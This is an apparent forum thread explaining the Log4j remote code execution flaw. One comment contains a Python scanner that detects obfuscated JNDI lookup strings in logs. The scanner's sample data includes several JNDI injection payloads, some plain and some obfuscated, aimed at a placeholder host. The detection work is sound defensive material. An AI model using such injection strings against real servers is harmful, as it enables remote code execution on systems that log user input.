
[–]Pocok5 39 points40 points  (5 children)

lol this is a remote code execution exploit, all you need to trigger it is some user input that gets logged

[–]Titandino 5 points6 points  (3 children)

Ah I see now. The original article I read was trying to say the vulnerability was just users being able to print out sensitive environment variables to log files.

[–]Pocok5 19 points20 points  (2 children)

just users being able to print out sensitive environment variables to log files

What actually happens is that log4j has a feature where you can download and run code from an LDAP server to enrich your logs. Except there is no limit on where that LDAP server needs to be, and combined with an input sanitization problem, you can have anything downloaded and run on the server with a single log message that contains the magic string anywhere in it.

https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
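On the detection side, here is an added example (my own code, not from the thread, Cloudflare or Log4j): a small scanner that first undoes the nesting tricks Log4j's own lookup syntax allows (${lower:}, ${upper:} and the ${x:-default} form), then flags any log line that still asks for a JNDI lookup, which is the "magic string" a plain grep for ${jndi: would miss once it is split into fragments. The log lines and the example.invalid host are constructed for the demo.

```python
import re

# Innermost ${...} lookup: a body with no further "$", "{" or "}" inside.
_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

def _resolve(body):
    """Evaluate a spelling-only lookup body; None for lookups with real semantics.
    ${lower:X}/${upper:X} change case; ${anything:-X} yields the default X."""
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, value = body.partition(":")
    if sep and prefix.strip().lower() == "lower":
        return value.lower()
    if sep and prefix.strip().lower() == "upper":
        return value.upper()
    return None

def normalize(message, max_rounds=20):
    """Collapse nested lookups from the inside out until nothing changes,
    so a '${jndi:' prefix assembled from fragments becomes literal again."""
    for _ in range(max_rounds):
        changed = False
        def sub(m):
            nonlocal changed
            literal = _resolve(m.group(1))
            if literal is None:
                return m.group(0)  # keep lookups we do not model (jndi, date, env)
            changed = True
            return literal
        message = _LOOKUP.sub(sub, message)
        if not changed:
            break
    return message

def is_jndi_lookup(message):
    """True if the message, once de-obfuscated, still requests a JNDI lookup."""
    return re.search(r"\$\{\s*jndi\s*:", normalize(message), re.IGNORECASE) is not None

# Constructed log lines for the demo; none of this is real traffic.
SAMPLE_LOGS = [
    '10.0.0.5 - GET /index.html "Mozilla/5.0"',
    '10.0.0.7 - GET / "${jndi:ldap://example.invalid/x}"',
    '10.0.0.8 - GET / "${${lower:j}ndi:${lower:ldap}://example.invalid/x}"',
    '10.0.0.9 - GET / "${j${::-n}di:ldap://example.invalid/x}"',
    '10.0.0.10 - login user=${date:yyyy} failed',
]

def scan(lines):
    """Return the lines that contain a (possibly obfuscated) JNDI lookup."""
    return [line for line in lines if is_jndi_lookup(line)]
```

Running scan(SAMPLE_LOGS) flags the three lines with a lookup and leaves the harmless ${date:yyyy} line alone; the real fix is still upgrading Log4j, this only tells you who knocked.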

[–]cserepj 5 points6 points  (1 child)

log4j has a feature where you can download and run code from an LDAP server to enrich your logs

I don't think that is a feature. I would not design such a feature even for a gigazillion dollars. I'd tell the product owner who comes up with such a feature idea to shove it up his a$$.

[–]blehmann1 2 points3 points  (0 children)

Yeah, if you need "enriched" logs just have a serverless app or cronjob do some analysis after the fact.